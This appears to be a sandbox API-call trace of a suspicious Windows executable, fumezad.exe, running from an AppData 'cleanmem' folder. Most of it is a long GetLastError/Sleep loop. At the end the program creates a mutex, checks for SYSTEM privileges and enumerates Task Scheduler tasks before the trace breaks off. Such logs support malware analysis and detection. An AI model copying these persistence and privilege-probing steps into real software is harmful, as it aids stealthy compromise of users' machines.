[0222.715] GetLastError () returned 0xcb [0222.715] Sleep (dwMilliseconds=0x1) [0222.733] GetLastError () returned 0xcb [0222.733] Sleep (dwMilliseconds=0x1) [0222.747] GetLastError () returned 0xcb [0222.747] Sleep (dwMilliseconds=0x1) [0222.770] GetLastError () returned 0xcb [0222.770] Sleep (dwMilliseconds=0x1) [0222.778] GetLastError () returned 0xcb [0222.778] Sleep (dwMilliseconds=0x1) [0222.793] GetLastError () returned 0xcb [0222.793] Sleep (dwMilliseconds=0x1) [0222.809] GetLastError () returned 0xcb [0222.809] Sleep (dwMilliseconds=0x1) [0222.824] GetLastError () returned 0xcb [0222.824] Sleep (dwMilliseconds=0x1) [0222.840] GetLastError () returned 0xcb [0222.840] Sleep (dwMilliseconds=0x1) [0222.856] GetLastError () returned 0xcb [0222.856] Sleep (dwMilliseconds=0x1) [0222.871] GetLastError () returned 0xcb [0222.871] Sleep (dwMilliseconds=0x1) [0222.887] GetLastError () returned 0xcb [0222.887] Sleep (dwMilliseconds=0x1) [0222.903] GetLastError () returned 0xcb [0222.903] Sleep (dwMilliseconds=0x1) [0222.918] GetLastError () returned 0xcb [0222.918] Sleep (dwMilliseconds=0x1) [0222.934] GetLastError () returned 0xcb [0222.934] Sleep (dwMilliseconds=0x1) [0222.949] GetLastError () returned 0xcb [0222.949] Sleep (dwMilliseconds=0x1) [0222.965] GetLastError () returned 0xcb [0222.965] Sleep (dwMilliseconds=0x1) [0222.980] GetLastError () returned 0xcb [0222.980] Sleep (dwMilliseconds=0x1) [0222.996] GetLastError () returned 0xcb [0222.996] Sleep (dwMilliseconds=0x1) [0223.012] GetLastError () returned 0xcb [0223.012] Sleep (dwMilliseconds=0x1) [0223.027] GetLastError () returned 0xcb [0223.027] Sleep (dwMilliseconds=0x1) [0223.043] GetLastError () returned 0xcb [0223.043] Sleep (dwMilliseconds=0x1) [0223.060] GetLastError () returned 0xcb [0223.060] Sleep (dwMilliseconds=0x1) [0223.074] GetLastError () returned 0xcb [0223.074] Sleep (dwMilliseconds=0x1) [0223.090] GetLastError () returned 0xcb [0223.090] Sleep (dwMilliseconds=0x1) [0223.105] GetLastError () returned 0xcb [0223.105] Sleep (dwMilliseconds=0x1) [0223.121] GetLastError () returned 0xcb [0223.121] Sleep (dwMilliseconds=0x1) [0223.136] GetLastError () returned 0xcb [0223.136] Sleep (dwMilliseconds=0x1) [0223.152] GetLastError () returned 0xcb [0223.152] Sleep (dwMilliseconds=0x1) [0223.168] GetLastError () returned 0xcb [0223.168] Sleep (dwMilliseconds=0x1) [0223.183] GetLastError () returned 0xcb [0223.183] Sleep (dwMilliseconds=0x1) [0223.199] GetLastError () returned 0xcb [0223.199] Sleep (dwMilliseconds=0x1) [0223.215] GetLastError () returned 0xcb [0223.215] Sleep (dwMilliseconds=0x1) [0223.230] GetLastError () returned 0xcb [0223.230] Sleep (dwMilliseconds=0x1) [0223.246] GetLastError () returned 0xcb [0223.246] Sleep (dwMilliseconds=0x1) [0223.261] GetLastError () returned 0xcb [0223.261] Sleep (dwMilliseconds=0x1) [0223.277] GetLastError () returned 0xcb [0223.277] Sleep (dwMilliseconds=0x1) [0223.293] GetLastError () returned 0xcb [0223.293] Sleep (dwMilliseconds=0x1) [0223.308] GetLastError () returned 0xcb [0223.308] Sleep (dwMilliseconds=0x1) [0223.324] GetLastError () returned 0xcb [0223.324] Sleep (dwMilliseconds=0x1) [0223.339] GetLastError () returned 0xcb [0223.339] Sleep (dwMilliseconds=0x1) [0223.355] GetLastError () returned 0xcb [0223.355] Sleep (dwMilliseconds=0x1) [0223.370] GetLastError () returned 0xcb [0223.370] Sleep (dwMilliseconds=0x1) [0223.386] GetLastError () returned 0xcb [0223.386] Sleep (dwMilliseconds=0x1) [0223.402] GetLastError () returned 0xcb [0223.402] Sleep (dwMilliseconds=0x1) [0223.417] GetLastError () returned 0xcb [0223.417] Sleep (dwMilliseconds=0x1) [0223.433] GetLastError () returned 0xcb [0223.433] Sleep (dwMilliseconds=0x1) [0223.450] GetLastError () returned 0xcb [0223.450] Sleep (dwMilliseconds=0x1) [0223.464] GetLastError () returned 0xcb [0223.464] Sleep (dwMilliseconds=0x1) [0223.480] GetLastError () returned 0xcb [0223.480] Sleep (dwMilliseconds=0x1) [0223.495] GetLastError () returned 0xcb [0223.495] Sleep (dwMilliseconds=0x1) [0223.511] GetLastError () returned 0xcb [0223.511] Sleep (dwMilliseconds=0x1) [0223.527] GetLastError () returned 0xcb [0223.527] Sleep (dwMilliseconds=0x1) [0223.542] GetLastError () returned 0xcb [0223.542] Sleep (dwMilliseconds=0x1) [0223.558] GetLastError () returned 0xcb [0223.558] Sleep (dwMilliseconds=0x1) [0223.574] GetLastError () returned 0xcb [0223.574] Sleep (dwMilliseconds=0x1) [0223.589] GetLastError () returned 0xcb [0223.589] Sleep (dwMilliseconds=0x1) [0223.605] GetLastError () returned 0xcb [0223.605] Sleep (dwMilliseconds=0x1) [0223.620] GetLastError () returned 0xcb [0223.620] Sleep (dwMilliseconds=0x1) [0223.636] GetLastError () returned 0xcb [0223.636] Sleep (dwMilliseconds=0x1) [0223.651] GetLastError () returned 0xcb [0223.651] Sleep (dwMilliseconds=0x1) [0223.667] GetLastError () returned 0xcb [0223.667] Sleep (dwMilliseconds=0x1) [0223.682] GetLastError () returned 0xcb [0223.682] Sleep (dwMilliseconds=0x1) [0223.703] GetLastError () returned 0xcb [0223.703] Sleep (dwMilliseconds=0x1) [0223.714] GetLastError () returned 0xcb [0223.714] Sleep (dwMilliseconds=0x1) [0223.729] GetLastError () returned 0xcb [0223.729] Sleep (dwMilliseconds=0x1) [0223.745] GetLastError () returned 0xcb [0223.745] Sleep (dwMilliseconds=0x1) [0223.760] GetLastError () returned 0xcb [0223.760] Sleep (dwMilliseconds=0x1) [0223.782] GetLastError () returned 0xcb [0223.782] Sleep (dwMilliseconds=0x1) [0223.792] GetLastError () returned 0xcb [0223.792] Sleep (dwMilliseconds=0x1) [0223.807] GetLastError () returned 0xcb [0223.807] Sleep (dwMilliseconds=0x1) [0223.823] GetLastError () returned 0xcb [0223.823] Sleep (dwMilliseconds=0x1) [0223.840] GetLastError () returned 0xcb [0223.840] Sleep (dwMilliseconds=0x1) [0223.854] GetLastError () returned 0xcb [0223.854] Sleep (dwMilliseconds=0x1) [0223.870] GetLastError () returned 0xcb [0223.870] Sleep (dwMilliseconds=0x1) [0223.885] GetLastError () returned 0xcb [0223.885] Sleep (dwMilliseconds=0x1) [0223.901] GetLastError () returned 0xcb [0223.901] Sleep (dwMilliseconds=0x1) [0223.917] GetLastError () returned 0xcb [0223.917] Sleep (dwMilliseconds=0x1) [0223.932] GetLastError () returned 0xcb [0223.932] Sleep (dwMilliseconds=0x1) [0223.948] GetLastError () returned 0xcb [0223.948] Sleep (dwMilliseconds=0x1) [0223.963] GetLastError () returned 0xcb [0223.963] Sleep (dwMilliseconds=0x1) [0223.979] GetLastError () returned 0xcb [0223.979] Sleep (dwMilliseconds=0x1) [0223.995] GetLastError () returned 0xcb [0223.995] Sleep (dwMilliseconds=0x1) [0224.010] GetLastError () returned 0xcb [0224.010] Sleep (dwMilliseconds=0x1) [0224.026] GetLastError () returned 0xcb [0224.026] Sleep (dwMilliseconds=0x1) [0224.041] GetLastError () returned 0xcb [0224.041] Sleep (dwMilliseconds=0x1) [0224.057] GetLastError () returned 0xcb [0224.057] Sleep (dwMilliseconds=0x1) [0224.072] GetLastError () returned 0xcb [0224.072] Sleep (dwMilliseconds=0x1) [0224.088] GetLastError () returned 0xcb [0224.088] Sleep (dwMilliseconds=0x1) [0224.104] GetLastError () returned 0xcb [0224.104] Sleep (dwMilliseconds=0x1) [0224.119] GetLastError () returned 0xcb [0224.119] Sleep (dwMilliseconds=0x1) [0224.135] GetLastError () returned 0xcb [0224.135] Sleep (dwMilliseconds=0x1) [0224.150] GetLastError () returned 0xcb [0224.150] Sleep (dwMilliseconds=0x1) [0224.166] GetLastError () returned 0xcb [0224.166] Sleep (dwMilliseconds=0x1) [0224.182] GetLastError () returned 0xcb [0224.182] Sleep (dwMilliseconds=0x1) [0224.197] GetLastError () returned 0xcb [0224.197] Sleep (dwMilliseconds=0x1) [0224.213] GetLastError () returned 0xcb [0224.213] Sleep (dwMilliseconds=0x1) [0224.228] GetLastError () returned 0xcb [0224.228] Sleep (dwMilliseconds=0x1) [0224.244] GetLastError () returned 0xcb [0224.244] Sleep (dwMilliseconds=0x1) [0224.260] GetLastError () returned 0xcb [0224.260] Sleep (dwMilliseconds=0x1) [0224.275] GetLastError () returned 0xcb [0224.275] Sleep (dwMilliseconds=0x1) [0224.291] GetLastError () returned 0xcb [0224.291] Sleep (dwMilliseconds=0x1) [0224.307] GetLastError () returned 0xcb [0224.307] Sleep (dwMilliseconds=0x1) [0224.322] GetLastError () returned 0xcb [0224.322] Sleep (dwMilliseconds=0x1) [0224.338] GetLastError () returned 0xcb [0224.338] Sleep (dwMilliseconds=0x1) [0224.353] GetLastError () returned 0xcb [0224.353] Sleep (dwMilliseconds=0x1) [0224.369] GetLastError () returned 0xcb [0224.369] Sleep (dwMilliseconds=0x1) [0224.384] GetLastError () returned 0xcb [0224.384] Sleep (dwMilliseconds=0x1) [0224.400] GetLastError () returned 0xcb [0224.400] Sleep (dwMilliseconds=0x1) [0224.416] GetLastError () returned 0xcb [0224.416] Sleep (dwMilliseconds=0x1) [0224.431] GetLastError () returned 0xcb [0224.431] Sleep (dwMilliseconds=0x1) [0224.447] GetLastError () returned 0xcb [0224.447] Sleep (dwMilliseconds=0x1) [0224.462] GetLastError () returned 0xcb [0224.462] Sleep (dwMilliseconds=0x1) [0224.478] GetLastError () returned 0xcb [0224.478] Sleep (dwMilliseconds=0x1) [0224.495] GetLastError () returned 0xcb [0224.495] Sleep (dwMilliseconds=0x1) [0224.509] GetLastError () returned 0xcb [0224.509] Sleep (dwMilliseconds=0x1) [0224.525] GetLastError () returned 0xcb [0224.525] Sleep (dwMilliseconds=0x1) [0224.542] GetLastError () returned 0xcb [0224.542] Sleep (dwMilliseconds=0x1) [0224.562] GetLastError () returned 0xcb [0224.562] Sleep (dwMilliseconds=0x1) [0224.572] GetLastError () returned 0xcb [0224.572] Sleep (dwMilliseconds=0x1) [0224.589] GetLastError () returned 0xcb [0224.590] Sleep (dwMilliseconds=0x1) [0224.603] GetLastError () returned 0xcb [0224.603] Sleep (dwMilliseconds=0x1) [0224.620] GetLastError () returned 0xcb [0224.620] Sleep (dwMilliseconds=0x1) [0224.634] GetLastError () returned 0xcb [0224.634] Sleep (dwMilliseconds=0x1) [0224.650] GetLastError () returned 0xcb [0224.650] Sleep (dwMilliseconds=0x1) [0224.665] GetLastError () returned 0xcb [0224.665] Sleep (dwMilliseconds=0x1) [0224.681] GetLastError () returned 0xcb [0224.681] Sleep (dwMilliseconds=0x1) [0224.696] GetLastError () returned 0xcb [0224.697] Sleep (dwMilliseconds=0x1) [0224.722] GetLastError () returned 0xcb [0224.722] Sleep (dwMilliseconds=0x1) [0224.728] GetLastError () returned 0xcb [0224.728] Sleep (dwMilliseconds=0x1) [0224.744] GetLastError () returned 0xcb [0224.744] Sleep (dwMilliseconds=0x1) [0224.759] GetLastError () returned 0xcb [0224.759] Sleep (dwMilliseconds=0x1) [0224.774] GetLastError () returned 0xcb [0224.775] Sleep (dwMilliseconds=0x1) [0224.801] GetLastError () returned 0xcb [0224.801] Sleep (dwMilliseconds=0x1) [0224.806] GetLastError () returned 0xcb [0224.806] Sleep (dwMilliseconds=0x1) [0224.821] GetLastError () returned 0xcb [0224.821] Sleep (dwMilliseconds=0x1) [0224.837] GetLastError () returned 0xcb [0224.837] Sleep (dwMilliseconds=0x1) [0224.853] GetLastError () returned 0xcb [0224.853] Sleep (dwMilliseconds=0x1) [0224.869] GetLastError () returned 0xcb [0224.869] Sleep (dwMilliseconds=0x1) [0224.884] GetLastError () returned 0xcb [0224.884] Sleep (dwMilliseconds=0x1) [0224.900] GetLastError () returned 0xcb [0224.900] Sleep (dwMilliseconds=0x1) [0224.915] GetLastError () returned 0xcb [0224.915] Sleep (dwMilliseconds=0x1) [0224.930] GetLastError () returned 0xcb [0224.930] Sleep (dwMilliseconds=0x1) [0224.946] GetLastError () returned 0xcb [0224.946] Sleep (dwMilliseconds=0x1) [0224.962] GetLastError () returned 0xcb [0224.962] Sleep (dwMilliseconds=0x1) [0224.977] GetLastError () returned 0xcb [0224.977] Sleep (dwMilliseconds=0x1) [0224.993] GetLastError () returned 0xcb [0224.993] Sleep (dwMilliseconds=0x1) [0225.008] GetLastError () returned 0xcb [0225.008] Sleep (dwMilliseconds=0x1) [0225.024] GetLastError () returned 0xcb [0225.024] Sleep (dwMilliseconds=0x1) [0225.040] GetLastError () returned 0xcb [0225.040] Sleep (dwMilliseconds=0x1) [0225.055] GetLastError () returned 0xcb [0225.055] Sleep (dwMilliseconds=0x1) [0225.071] GetLastError () returned 0xcb [0225.071] Sleep (dwMilliseconds=0x1) [0225.087] GetLastError () returned 0xcb [0225.087] Sleep (dwMilliseconds=0x1) [0225.102] GetLastError () returned 0xcb [0225.102] Sleep (dwMilliseconds=0x1) [0225.118] GetLastError () returned 0xcb [0225.118] Sleep (dwMilliseconds=0x1) [0225.133] GetLastError () returned 0xcb [0225.133] Sleep (dwMilliseconds=0x1) [0225.149] GetLastError () returned 0xcb [0225.149] Sleep (dwMilliseconds=0x1) [0225.164] GetLastError () returned 0xcb [0225.164] Sleep (dwMilliseconds=0x1) [0225.180] GetLastError () returned 0xcb [0225.180] Sleep (dwMilliseconds=0x1) [0225.196] GetLastError () returned 0xcb [0225.196] Sleep (dwMilliseconds=0x1) [0225.212] GetLastError () returned 0xcb [0225.212] Sleep (dwMilliseconds=0x1) [0225.227] GetLastError () returned 0xcb [0225.227] Sleep (dwMilliseconds=0x1) [0225.242] GetLastError () returned 0xcb [0225.243] Sleep (dwMilliseconds=0x1) [0225.258] GetLastError () returned 0xcb [0225.258] Sleep (dwMilliseconds=0x1) [0225.274] GetLastError () returned 0xcb [0225.274] Sleep (dwMilliseconds=0x1) [0225.289] GetLastError () returned 0xcb [0225.289] Sleep (dwMilliseconds=0x1) [0225.305] GetLastError () returned 0xcb [0225.305] Sleep (dwMilliseconds=0x1) [0225.320] GetLastError () returned 0xcb [0225.320] Sleep (dwMilliseconds=0x1) [0225.336] GetLastError () returned 0xcb [0225.336] Sleep (dwMilliseconds=0x1) [0225.352] GetLastError () returned 0xcb [0225.352] Sleep (dwMilliseconds=0x1) [0225.367] GetLastError () returned 0xcb [0225.367] Sleep (dwMilliseconds=0x1) [0225.383] GetLastError () returned 0xcb [0225.383] Sleep (dwMilliseconds=0x1) [0225.399] GetLastError () returned 0xcb [0225.399] Sleep (dwMilliseconds=0x1) [0225.414] GetLastError () returned 0xcb [0225.414] Sleep (dwMilliseconds=0x1) [0225.430] GetLastError () returned 0xcb [0225.430] Sleep (dwMilliseconds=0x1) [0225.445] GetLastError () returned 0xcb [0225.445] Sleep (dwMilliseconds=0x1) [0225.461] GetLastError () returned 0xcb [0225.461] Sleep (dwMilliseconds=0x1) [0225.476] GetLastError () returned 0xcb [0225.476] Sleep (dwMilliseconds=0x1) [0225.492] GetLastError () returned 0xcb [0225.492] Sleep (dwMilliseconds=0x1) [0225.508] GetLastError () returned 0xcb [0225.508] Sleep (dwMilliseconds=0x1) [0225.523] GetLastError () returned 0xcb [0225.523] Sleep (dwMilliseconds=0x1) [0225.539] GetLastError () returned 0xcb [0225.539] Sleep (dwMilliseconds=0x1) [0225.555] GetLastError () returned 0xcb [0225.555] Sleep (dwMilliseconds=0x1) [0225.570] GetLastError () returned 0xcb [0225.570] Sleep (dwMilliseconds=0x1) [0225.586] GetLastError () returned 0xcb [0225.586] Sleep (dwMilliseconds=0x1) [0225.603] GetLastError () returned 0xcb [0225.604] Sleep (dwMilliseconds=0x1) [0225.617] GetLastError () returned 0xcb [0225.617] Sleep (dwMilliseconds=0x1) [0225.633] GetLastError () returned 0xcb [0225.633] Sleep (dwMilliseconds=0x1) [0225.648] GetLastError () returned 0xcb [0225.648] Sleep (dwMilliseconds=0x1) [0225.664] GetLastError () returned 0xcb [0225.664] Sleep (dwMilliseconds=0x1) [0225.679] GetLastError () returned 0xcb [0225.679] Sleep (dwMilliseconds=0x1) [0225.695] GetLastError () returned 0xcb [0225.695] Sleep (dwMilliseconds=0x1) [0225.716] GetLastError () returned 0xcb [0225.716] Sleep (dwMilliseconds=0x1) [0225.726] GetLastError () returned 0xcb [0225.726] Sleep (dwMilliseconds=0x1) [0225.742] GetLastError () returned 0xcb [0225.742] Sleep (dwMilliseconds=0x1) [0225.757] GetLastError () returned 0xcb [0225.757] Sleep (dwMilliseconds=0x1) [0225.773] GetLastError () returned 0xcb [0225.773] Sleep (dwMilliseconds=0x1) [0225.788] GetLastError () returned 0xcb [0225.788] Sleep (dwMilliseconds=0x1) [0225.812] GetLastError () returned 0xcb [0225.812] Sleep (dwMilliseconds=0x1) [0225.820] GetLastError () returned 0xcb [0225.820] Sleep (dwMilliseconds=0x1) [0225.835] GetLastError () returned 0xcb [0225.835] Sleep (dwMilliseconds=0x1) [0225.851] GetLastError () returned 0xcb [0225.851] Sleep (dwMilliseconds=0x1) [0225.866] GetLastError () returned 0xcb [0225.866] Sleep (dwMilliseconds=0x1) [0225.882] GetLastError () returned 0xcb [0225.882] Sleep (dwMilliseconds=0x1) [0225.898] GetLastError () returned 0xcb [0225.898] Sleep (dwMilliseconds=0x1) [0225.913] GetLastError () returned 0xcb [0225.913] Sleep (dwMilliseconds=0x1) [0225.929] GetLastError () returned 0xcb [0225.929] Sleep (dwMilliseconds=0x1) [0225.944] GetLastError () returned 0xcb [0225.944] Sleep (dwMilliseconds=0x1) [0225.979] GetLastError () returned 0xcb [0225.979] Sleep (dwMilliseconds=0x1) [0225.991] GetLastError () returned 0xcb [0225.991] Sleep (dwMilliseconds=0x1) [0226.008] GetLastError () returned 0xcb [0226.008] Sleep (dwMilliseconds=0x1) [0226.022] GetLastError () returned 0xcb [0226.022] Sleep (dwMilliseconds=0x1) [0226.038] GetLastError () returned 0xcb [0226.038] Sleep (dwMilliseconds=0x1) [0226.054] GetLastError () returned 0xcb [0226.054] Sleep (dwMilliseconds=0x1) [0226.070] GetLastError () returned 0xcb [0226.070] Sleep (dwMilliseconds=0x1) [0226.085] GetLastError () returned 0xcb [0226.085] Sleep (dwMilliseconds=0x1) [0226.100] GetLastError () returned 0xcb [0226.100] Sleep (dwMilliseconds=0x1) [0226.116] GetLastError () returned 0xcb [0226.116] Sleep (dwMilliseconds=0x1) [0226.132] GetLastError () returned 0xcb [0226.132] Sleep (dwMilliseconds=0x1) [0226.147] GetLastError () returned 0xcb [0226.147] Sleep (dwMilliseconds=0x1) [0226.163] GetLastError () returned 0xcb [0226.163] Sleep (dwMilliseconds=0x1) [0226.179] GetLastError () returned 0xcb [0226.179] Sleep (dwMilliseconds=0x1) [0226.194] GetLastError () returned 0xcb [0226.194] Sleep (dwMilliseconds=0x1) [0226.210] GetLastError () returned 0xcb [0226.210] Sleep (dwMilliseconds=0x1) [0226.225] GetLastError () returned 0xcb [0226.225] Sleep (dwMilliseconds=0x1) [0226.241] GetLastError () returned 0xcb [0226.241] Sleep (dwMilliseconds=0x1) [0226.256] GetLastError () returned 0xcb [0226.256] Sleep (dwMilliseconds=0x1) [0226.272] GetLastError () returned 0xcb [0226.272] Sleep (dwMilliseconds=0x1) [0226.288] GetLastError () returned 0xcb [0226.288] Sleep (dwMilliseconds=0x1) [0226.303] GetLastError () returned 0xcb [0226.303] Sleep (dwMilliseconds=0x1) [0226.319] GetLastError () returned 0xcb [0226.319] Sleep (dwMilliseconds=0x1) [0226.334] GetLastError () returned 0xcb [0226.334] Sleep (dwMilliseconds=0x1) [0226.350] GetLastError () returned 0xcb [0226.350] Sleep (dwMilliseconds=0x1) [0226.366] GetLastError () returned 0xcb [0226.366] Sleep (dwMilliseconds=0x1) [0226.381] GetLastError () returned 0xcb [0226.381] Sleep (dwMilliseconds=0x1) [0226.397] GetLastError () returned 0xcb [0226.397] Sleep (dwMilliseconds=0x1) [0226.412] GetLastError () returned 0xcb [0226.412] Sleep (dwMilliseconds=0x1) [0226.428] GetLastError () returned 0xcb [0226.428] Sleep (dwMilliseconds=0x1) [0226.444] GetLastError () returned 0xcb [0226.444] Sleep (dwMilliseconds=0x1) [0226.459] GetLastError () returned 0xcb [0226.459] Sleep (dwMilliseconds=0x1) [0226.475] GetLastError () returned 0xcb [0226.475] Sleep (dwMilliseconds=0x1) [0226.490] GetLastError () returned 0xcb [0226.490] Sleep (dwMilliseconds=0x1) [0226.506] GetLastError () returned 0xcb [0226.506] Sleep (dwMilliseconds=0x1) [0226.522] GetLastError () returned 0xcb [0226.522] Sleep (dwMilliseconds=0x1) [0226.537] GetLastError () returned 0xcb [0226.537] Sleep (dwMilliseconds=0x1) [0226.553] GetLastError () returned 0xcb [0226.553] Sleep (dwMilliseconds=0x1) [0226.569] GetLastError () returned 0xcb [0226.569] Sleep (dwMilliseconds=0x1) [0226.584] GetLastError () returned 0xcb [0226.584] Sleep (dwMilliseconds=0x1) [0226.600] GetLastError () returned 0xcb [0226.600] Sleep (dwMilliseconds=0x1) [0226.616] GetLastError () returned 0xcb [0226.616] Sleep (dwMilliseconds=0x1) [0226.631] GetLastError () returned 0xcb [0226.631] Sleep (dwMilliseconds=0x1) [0226.647] GetLastError () returned 0xcb [0226.647] Sleep (dwMilliseconds=0x1) [0226.662] GetLastError () returned 0xcb [0226.662] Sleep (dwMilliseconds=0x1) [0226.678] GetLastError () returned 0xcb [0226.678] Sleep (dwMilliseconds=0x1) [0226.693] GetLastError () returned 0xcb [0226.693] Sleep (dwMilliseconds=0x1) [0226.714] GetLastError () returned 0xcb [0226.714] Sleep (dwMilliseconds=0x1) [0226.725] GetLastError () returned 0xcb [0226.725] Sleep (dwMilliseconds=0x1) [0226.740] GetLastError () returned 0xcb [0226.740] Sleep (dwMilliseconds=0x1) [0226.756] GetLastError () returned 0xcb [0226.756] Sleep (dwMilliseconds=0x1) [0226.771] GetLastError () returned 0xcb [0226.771] Sleep (dwMilliseconds=0x1) [0226.787] GetLastError () returned 0xcb [0226.787] Sleep (dwMilliseconds=0x1) [0226.802] GetLastError () returned 0xcb [0226.802] Sleep (dwMilliseconds=0x1) [0226.824] GetLastError () returned 0xcb [0226.824] Sleep (dwMilliseconds=0x1) [0226.834] GetLastError () returned 0xcb [0226.834] Sleep (dwMilliseconds=0x1) [0226.849] GetLastError () returned 0xcb [0226.849] Sleep (dwMilliseconds=0x1) [0226.865] GetLastError () returned 0xcb [0226.865] Sleep (dwMilliseconds=0x1) [0226.880] GetLastError () returned 0xcb [0226.880] Sleep (dwMilliseconds=0x1) [0226.896] GetLastError () returned 0xcb [0226.896] Sleep (dwMilliseconds=0x1) [0226.912] GetLastError () returned 0xcb [0226.912] Sleep (dwMilliseconds=0x1) [0226.927] GetLastError () returned 0xcb [0226.927] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12ee80, nSize=0x200 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0226.927] Sleep (dwMilliseconds=0x1) [0226.943] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem") returned 1 [0226.943] Sleep (dwMilliseconds=0x1) [0226.958] PathAddBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\") returned="" [0226.958] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ea7d0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0226.959] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem")) returned 1 [0226.959] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x1000e780) returned 0x2e9120 [0226.959] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0226.962] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0226.969] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0226.970] GetWindowsDirectoryW (in: lpBuffer=0x12e6d0, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa [0226.970] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x12e8f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x12e8f8*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0226.971] CreateMutexW (lpMutexAttributes=0x12e910, bInitialOwner=1, lpName="Global\\E0B7509842610") returned 0xfc [0226.971] LocalFree (hMem=0x2e3400) returned 0x0 [0226.971] GetLastError () returned 0x0 [0226.971] GetCurrentProcess () returned 0xffffffffffffffff [0226.971] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x12ea28 | out: TokenHandle=0x12ea28*=0x104) returned 1 [0226.971] GetTokenInformation (in: TokenHandle=0x104, TokenInformationClass=0x1, TokenInformation=0x12e990, TokenInformationLength=0x54, ReturnLength=0x12ea10 | out: TokenInformation=0x12e990, ReturnLength=0x12ea10) returned 1 [0226.971] AllocateAndInitializeSid (in: pIdentifierAuthority=0x12ea18, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12ea20 | out: pSid=0x12ea20*=0x2f24b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0226.971] EqualSid (pSid1=0x12e9a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x2f24b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0226.971] CloseHandle (hObject=0x104) returned 1 [0226.971] GetVersion () returned 0x1db10106 [0226.971] CoCreateInstance (in: rclsid=0x1001b3c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1001cc70*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1001cc68 | out: ppv=0x1001cc68*=0x2959d0) returned 0x0 [0226.976] TaskScheduler:ITaskService:Connect (This=0x2959d0, serverName=0x12e5c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x12e6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x12e600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x12e640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0226.980] TaskScheduler:ITaskService:GetFolder (in: This=0x2959d0, Path=0x0, ppFolder=0x12ea20 | out: ppFolder=0x12ea20*=0x3cdf80) returned 0x0 [0226.982] ITaskFolder:GetTasks (in: This=0x3cdf80, flags=1, ppTasks=0x12e340 | out: ppTasks=0x12e340*=0x2969b0) returned 0x0 [0226.985] IRegisteredTaskCollection:get_Count (in: This=0x2969b0, pCount=0x12e4a0 | out: pCount=0x12e4a0*=5) returned 0x0 [0226.985] IRegisteredTaskCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x12e330 | out: ppRegisteredTask=0x12e330*=0x296ab0) returned 0x0 [0226.986] IRegisteredTask:get_Name (in: This=0x296ab0, pName=0x12e350 | out: pName=0x12e350*="Adobe Flash Player Updater") returned 0x0 [0226.986] IRegisteredTask:get_Xml (in: This=0x296ab0, pXml=0x12e338 | out: pXml=0x12e338*="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is 